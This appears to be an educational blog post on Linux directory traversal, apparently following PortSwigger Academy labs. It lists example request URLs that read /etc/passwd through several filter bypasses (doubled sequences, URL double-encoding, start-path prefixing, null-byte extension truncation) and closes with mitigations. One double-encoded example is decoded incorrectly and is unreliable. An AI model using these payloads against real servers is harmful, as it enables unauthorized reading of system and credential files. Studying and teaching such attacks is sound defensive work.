Exploiting directory traversal (Linux)

Understanding directory traversal:

Directory traversal or file path traversal allows attackers to read any arbitrary file on a system; this may include sensitive data such as: credentials, usernames, web application code and so on. On a Linux server, files can be read if the user has explicit permission to read. Typically, the www-data user is used for a web application. Thus, while sensitive files like the /etc/shadow file cannot be read, other files such as /etc/passwd can, as usually, this file is world readable. In any case, further information is provided to the attacker, further enhancing their attack on the application.

Note: This blog post will follow the labs over at Portswigger academy.

The fundamental concept

Let us consider an application which displays images of different products to the user. If we right-click on any image and look at the URL we see something interesting. Take this simple example:

https://vulnerablewebsite.com/image?filename=television.jpg

Here, we see the server using the filename= parameter to look for files within the current directory, in order to output its contents to the user. However, this is a real filename of a real image on the server. What would happen if we try to access a file which is not an image, such as the /etc/passwdfile?

In order to exploit this, it is not necessary to know the in which directory these files remain. For we can traverse directories using these crafty characters: ../ This tells the server to go back a directory place. For example: if television.jpg was located in /var/www/images/ then we would be placed at /var/www/. Subsequently, we can then traverse back to the root directory. The great thing is that the amount of directories we have to traverse does not need to be exact. We can place as many ../ as we like, just as long as we get to the root directory. Once there, files such as /etc/passwd can be read, as long as they are readable by the user.

Sometimes, traversing using ../ is not needed. An arbitrary file can be accessed just by the absolute path. That is, where the file is located relative to the root / directory. For example:

https://vulnerablewebsite.com/image?filename=/etc/passwd

Note: This is a very simple example of directory traversal and modern applications, generally, will not be so generous to allow us to exploit them so trivially. As we go further into this post, we shall see ways to circumvent certain mitigations via multiple techniques, such as URL encoding.

Circumvent certain mitigations

Stripped traversal sequences:

Sometimes, traversal sequences may be stripped, not allowing the attacker to traverse back to the root directory. For example:

https://vulnerablewebsite.com/image?filename=../../../etc/passwd

If we send this to the server, we are returned with an error as the ../ is stripped, before being processed. As a result, the true URL would look like this:

https://vulnerablewebsite.com/image?filename=etcpasswd

This file does not exist within the current directory, hence the error. Now, a way to circumvent this is to 'double up' on these traversal sequences. Let's take a look.

https://vulnerablewebsite.com/image?filename=....//....//....//etc//passwd

The web server will strip those traversal sequences, but leave behind valid ones we saw earlier. This takes us back to the root directory, and provides the attacker with access to /etc/passwd. Pretty nice. It is worth noting, on Linux systems the sequence ..// is equivalent to ../ with one slash. Therefore, if slashes are being stripped, adding another one may be another way to test the application.

URL Encoding

Sometimes these earlier techniques will not be successful as the application fully strips those traversal sequences. URL encoding replaces certain characters (non-ASCII) "%" followed by hexadecimal digits. thus, URL encoding turns ../ into %2e%2e%2f or even double encoding them: %252e%252e%252f. For example:

https://vulnerablewebsite.com/image?filename=%252e%252e%252e%252fetc/passwd

This URL is doubled encoded. Now, the application will process this as ../../../etc/passwd allowing an attacker to read this file.

Validation of the start path

An application may require that a filename must start with an expected base folder. For example: if the base folder is /var/www/images then directory traversal like this ?filename=/../../../etc/passwd will not work, as the base of the directory is not present. Let's take an example:

https://vulnerablewebsite.com/image?filename=/var/www/images/television.jpg

Here, the we see specifically in which directory television.jpg is located in. Removing the base directory will return an error. As a result, the attacker must traverse from within the base directory, like so:

https://vulnerablewebsite.com/image?filename=/var/www/images/../../../etc/passwd

The start path is valid here, and now traversing directories is successful.

File extension bypass

Sometimes, applications will hard-code an extension while reading a file. The request will look like so:

https://vulnerablewebsite.com/image?filename=/etc/passwd.jpg

This uses an absolute path to showcase what occurs. In order to mitigate this, a NULL byte %00 is used to essentially remove the .jpg portion of the request. If improperly configured, the application will allow an attacker to request any arbitrary file on the system, granted they are readable. For example:

https://vulnerablewebsite.com/image?filename=../../../etc/passwd%00.jpg

Here, the path is terminated before the extension, and so the file can be read.

Mitigation

This post covered some techniques on directory traversal and on how to bypass certain filters attempted by the server. How does one mitigate them?

Validate user input: All user input is evil, whether it is intended by the application or not. It sounds obvious, which it is, but proper validation is critical. Using whitelists, or ensuring that only specific characters are allowed (e.g. alphanumeric), and ensuring the base directory is always at the beginning of the path, will decrease the likelihood of being vulnerable.
Principle of least-privilege: Ensure the server does not have more privileges then is necessary for a specific function (in this case, to run a web application). Why would a web server need access to /etc/shadow? It doesn't. Understand what access the web server user has to the file system.
Chroot jail: This changes the root directory to a specified one. As a result, the jail will run essentially in a sandbox, where within it, everything is specified and set by the user. Therefore, if a vulnerability is discovered, the impact of the vulnerability will be decreased.